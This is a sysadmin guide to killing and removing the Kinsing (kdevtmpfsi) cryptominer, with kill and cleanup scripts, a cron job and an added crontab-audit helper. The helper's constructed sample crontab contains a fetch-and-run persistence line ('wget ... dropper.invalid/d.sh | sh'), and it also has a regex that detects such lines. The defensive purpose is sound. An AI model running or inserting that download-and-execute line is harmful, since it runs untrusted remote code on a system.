Kinsing malware (kdevtmpfsi) : how to kill


kailas@strategicerp..com

2023-11-03 14:28:39



    kdevtmpfsi malware found in postgres Database

    CHALLENGE: kdevtmpfsi is using 100% processor and server memory.

    SOLUTION: Create a bash script to kill the process.

    Kinsing malware targets misconfigured Docker containers, especially Redis instances (port 6379). The malware runs a Linux process in the background, kdevtmpfsi, which consumes the server's processor and memory. Its main purpose is to set up a cryptocurrency miner. Attacks on container environments seem to have been on the rise recently, with a huge spike in the number of cases in March 2020.

    1. Identify the issue
    Having root access to the server can help to find and delete the malware.
    # Check if the malicious process is running
    htop

    # Find infected files:
    find / -name kdevtmpfsi
    find / -name kinsing

    2. Option 1) Prepare a bash script that kills the process every 20 seconds, and run it in the background.

    Bash script
    #!/bin/sh
    # /root/scripts/ctKillProc.sh
    # Kill every kdevtmpfsi process, then wait 20 seconds and repeat.
    while true; do
    # PIDs of all matching processes, one per line ("grep -v grep" drops this pipeline itself)
    processId=$(ps -ef | grep 'kdevtmpfsi' | grep -v 'grep' | awk '{ print $2 }')
    echo $processId
    # Only call kill when something was found, otherwise kill prints a usage error
    [ -n "$processId" ] && kill -9 $processId
    echo "[`date +%Y%m%d%H%M`] kdevtmpfsi killed."
    sleep 20
    done
    exit 1

    Run the script in the background
    nohup sh  /root/scripts/ctKillProc.sh &


    2. Option 2) Create a script to kill and remove kdevtmpfsi

    Create a new bash script file:

    nano kill.sh
    and add the following code to it.

    #!/bin/bash
    # Kill the miner and its loader, then delete their binaries wherever they were dropped.
    kill $(pgrep kdevtmp)
    kill $(pgrep kinsing)
    # The ";" that ends -exec must be escaped, otherwise the shell swallows it
    find / -iname kdevtmpfsi -exec rm -fv {} \;
    find / -iname kinsing -exec rm -fv {} \;
    rm /tmp/kdevtmp*
    rm /tmp/kinsing*
    Make the script executable.

    chmod +x kill.sh
    Add a cron job to run the script every minute.

    sudo crontab -e
    Be sure that you give the correct path for your script.

    * * * * * /bin/bash /root/scripts/kill.sh
    Verify that the cron service is running with the following command: # systemctl status cron

    3. Remove the malware's crontab line from the affected user's crontab.
    4. Close all unnecessary open ports in the firewall.
    5. Disable shell access for the user (from CWP).
    6. Update all services/projects to the latest versions available in your package manager.
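    The following is an added example, not code from the original article: a small triage helper that records where each kdevtmpfsi/kinsing process's binary lives before killing it (so the right file is removed in step 2) and audits crontabs for the persistence entry mentioned in step 3. Function names are my own and the crontab it writes is a constructed sample, not a real capture.

```shell
#!/bin/sh
# Added example, not code from the original article: function names are mine
# and the crontab written below is a constructed sample, not a real capture.
# Write a constructed crontab to $1 so the audit can be exercised offline.
write_sample_crontab() {
    cat > "$1" <<'EOF'
# constructed sample: two legitimate jobs and two persistence entries
0 3 * * * /usr/bin/certbot renew --quiet
* * * * * wget -q -O - http://dropper.invalid/d.sh | sh > /dev/null 2>&1
30 2 * * 0 /root/scripts/backup.sh
*/5 * * * * /tmp/kdevtmpfsi
EOF
}

# Print non-comment crontab lines that name the known binaries or pipe a
# download straight into a shell (how the miner gets re-launched after a kill).
suspicious_cron_lines() {
    grep -v '^[[:space:]]*#' "$1" \
      | grep -Ei 'kdevtmpfsi|kinsing|(curl|wget)[^|]*[|][[:space:]]*(ba)?sh([[:space:]]|$)'
}

# Number of suspicious lines in a crontab file (0 when it is clean).
suspicious_cron_count() {
    suspicious_cron_lines "$1" | wc -l | tr -d ' '
}

# Audit every user's crontab and the system cron files (needs root).
audit_all_crontabs() {
    for f in /var/spool/cron/crontabs/* /var/spool/cron/* /etc/cron.d/* /etc/crontab; do
        [ -f "$f" ] && suspicious_cron_lines "$f" | sed "s|^|$f: |"
    done
}

# Record PID, parent PID and executable path of each process named $1, then
# kill it. The path tells you which file to delete so it cannot be restarted.
kill_and_record() {
    for pid in $(pgrep -x "$1" 2>/dev/null); do
        exe=$(readlink "/proc/$pid/exe" 2>/dev/null || echo unknown)
        ppid=$(ps -o ppid= -p "$pid" 2>/dev/null | tr -d ' ')
        echo "$(date +%Y%m%d%H%M%S) killing $1 pid=$pid ppid=$ppid exe=$exe"
        kill -9 "$pid"
    done
}

# Demonstration on the constructed sample (no real processes are touched).
sample=$(mktemp)
write_sample_crontab "$sample"
echo "suspicious entries found: $(suspicious_cron_count "$sample")"
suspicious_cron_lines "$sample"
rm -f "$sample"
```

    Run kill_and_record kdevtmpfsi and kill_and_record kinsing as root, then audit_all_crontabs, and delete the files the exe= paths point to.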
